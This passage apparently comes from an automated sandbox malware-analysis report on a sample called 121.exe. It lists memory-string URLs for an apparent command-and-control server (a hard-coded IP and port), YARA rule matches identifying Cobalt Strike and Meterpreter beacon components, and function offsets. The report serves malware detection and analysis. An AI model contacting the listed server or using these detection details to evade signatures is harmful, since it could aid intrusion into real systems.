00000000.00000003.2972819737.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3060018775.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2331738304.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3092041130.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3449261664.00000000000F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/
              Source: 121.exe, 00000000.00000003.2364494903.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2454148896.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2331738304.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2422827917.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2392522291.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2303817957.00000000000F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/-
              Source: 121.exe, 00000000.00000003.2726578993.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2607132749.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2548055513.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2665805385.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2635387413.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2576279859.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2694595334.00000000000F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/2
              Source: 121.exe, 00000000.00000003.2245055221.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2213683301.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3060018775.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3092041130.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2274708587.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2185358392.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3031853030.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3120178982.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2272990691.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2913297438.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2215047117.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2941581497.00000000000F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/226.16:60421/
              Source: 121.exe, 00000000.00000003.2665805385.00000000000F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/?r
              Source: 121.exe, 00000000.00000003.3151184537.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3179225688.00000000000F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/T
              Source: 121.exe, 00000000.00000002.4495724989.00000000000E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/V
              Source: 121.exe, 00000000.00000003.2126844172.00000000000F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/WNIt
              Source: 121.exe, 00000000.00000002.4495724989.00000000000E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/a
              Source: 121.exe, 00000000.00000003.2548055513.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2517825725.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.00000000000F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/b
              Source: 121.exe, 00000000.00000003.2331738304.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3358305653.000000000011B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/ca
              Source: 121.exe, 00000000.00000003.3893306724.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3540285999.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3599182783.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4366341910.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3509521159.000000000011B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/ca2dY
              Source: 121.exe, 00000000.00000003.3092041130.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3120178982.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4014515237.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3122009496.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2303817957.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2334091700.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2331738304.000000000011B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/ca8
              Source: 121.exe, 00000000.00000003.3951714993.000000000011B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/caEdh
              Source: 121.exe, 00000000.00000003.4307921187.000000000011B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/caIdd
              Source: 121.exe, 00000000.00000003.4190918954.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3151184537.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3181156239.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3179225688.000000000011B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/caJda
              Source: 121.exe, 00000000.00000002.4495724989.00000000000E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/caM
              Source: 121.exe, 00000000.00000003.2185358392.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2215028734.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2213683301.000000000011A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/caOdb
              Source: 121.exe, 00000000.00000003.3210323568.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3238480994.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3241004912.000000000011B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/caTd
              Source: 121.exe, 00000000.00000003.4072645930.000000000011B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/caX
              Source: 121.exe, 00000000.00000002.4495724989.00000000000E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/cab
              Source: 121.exe, 00000000.00000003.2517825725.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2519144542.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.000000000011B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/cafa.dM
              Source: 121.exe, 00000000.00000002.4495724989.000000000008C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/cagK
              Source: 121.exe, 00000000.00000003.2364494903.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2393839164.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2392522291.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2758216720.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2726578993.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2759574404.000000000011B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/cagd
              Source: 121.exe, 00000000.00000003.4130796318.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4072645930.000000000011B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/cald
              Source: 121.exe, 00000000.00000003.4249526901.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3893306724.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3270332274.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2694595334.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2665805385.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3062381181.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3031853030.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2821596006.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3479245632.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2882630735.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3477221868.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4072645930.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2697480697.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3449261664.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2850541886.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3300306811.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3298309211.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4366341910.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2941581497.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2880742433.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2943712531.000000000011B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/cap
              Source: 121.exe, 00000000.00000003.2821596006.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2820180707.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2156494637.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2126844172.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2155147374.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2792190012.000000000011B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/capd
              Source: 121.exe, 00000000.00000003.3092041130.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2972819737.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3120178982.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3002324860.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3122009496.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3000783488.000000000011B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/car
              Source: 121.exe, 00000000.00000003.2972819737.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3002324860.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2941581497.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2943712531.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3000783488.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2913297438.000000000011B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/cavcsOdb
              Source: 121.exe, 00000000.00000003.4249526901.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3389400003.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3417364243.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4190918954.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3419421492.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3329829025.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3360034969.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3358305653.000000000011B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/cavd
              Source: 121.exe, 00000000.00000003.3835071770.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2454148896.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2882630735.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2185358392.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2215028734.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2850541886.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2517825725.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2519144542.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2941581497.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2880742433.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2913297438.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2213683301.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2422827917.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2455534442.000000000011B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/cax
              Source: 121.exe, 00000000.00000003.2364494903.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2454148896.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2422827917.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2392522291.00000000000F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/k

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
              Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
              Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
              Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
              Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
              Source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
              Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
              Source: Process Memory Space: 121.exe PID: 5000, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
              Source: Process Memory Space: 121.exe PID: 5000, type: MEMORYSTRMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
              Source: Process Memory Space: 121.exe PID: 5000, type: MEMORYSTRMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF1268 CreateProcessWithLogonW,GetLastError,0_2_00CF1268
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A519280_2_00A51928
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A559140_2_00A55914
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A3916C0_2_00A3916C
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A5AAB00_2_00A5AAB0
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A512640_2_00A51264
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A5C3970_2_00A5C397
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A5239C0_2_00A5239C
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A403340_2_00A40334
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A503740_2_00A50374
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A4F5A80_2_00A4F5A8
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A396800_2_00A39680
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A5C6800_2_00A5C680
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A3CE3C0_2_00A3CE3C
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A5E6000_2_00A5E600
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A5B7B00_2_00A5B7B0
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A5CFF00_2_00A5CFF0
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00A46F380_2_00A46F38
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D001A80_2_00D001A8
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CEA2800_2_00CEA280
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D0D2800_2_00D0D280
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D0F2000_2_00D0F200
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CEDA3C0_2_00CEDA3C
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D0DBF00_2_00D0DBF0
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D0C3B00_2_00D0C3B0
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF7B380_2_00CF7B38
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CE9D6C0_2_00CE9D6C
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D065140_2_00D06514
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D025280_2_00D02528
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D0B6B00_2_00D0B6B0
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF867C0_2_00CF867C
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D01E640_2_00D01E64
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D0CF970_2_00D0CF97
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D02F9C0_2_00D02F9C
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D00F740_2_00D00F74
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF0F340_2_00CF0F34
              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
              Source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
